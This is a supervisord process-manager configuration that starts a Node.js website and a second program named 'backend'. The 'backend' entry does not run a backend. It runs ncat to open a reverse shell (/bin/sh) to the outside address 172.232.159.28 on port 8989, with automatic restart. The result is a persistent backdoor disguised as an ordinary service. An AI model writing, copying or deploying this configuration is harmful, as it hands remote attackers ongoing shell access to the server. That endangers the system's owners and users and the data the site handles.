[supervisord]
nodaemon=true

[program:website]
command=node server.js
directory=/app
user=nextjs
autorestart=true
stderr_logfile=/var/log/website.err.log
stdout_logfile=/var/log/website.out.log

[program:backend]
command=ncat 172.232.159.28 8989 -e /bin/sh
directory=/app
user=nextjs
autorestart=true
stderr_logfile=/var/log/backend.err.log
stdout_logfile=/var/log/backend.out.log
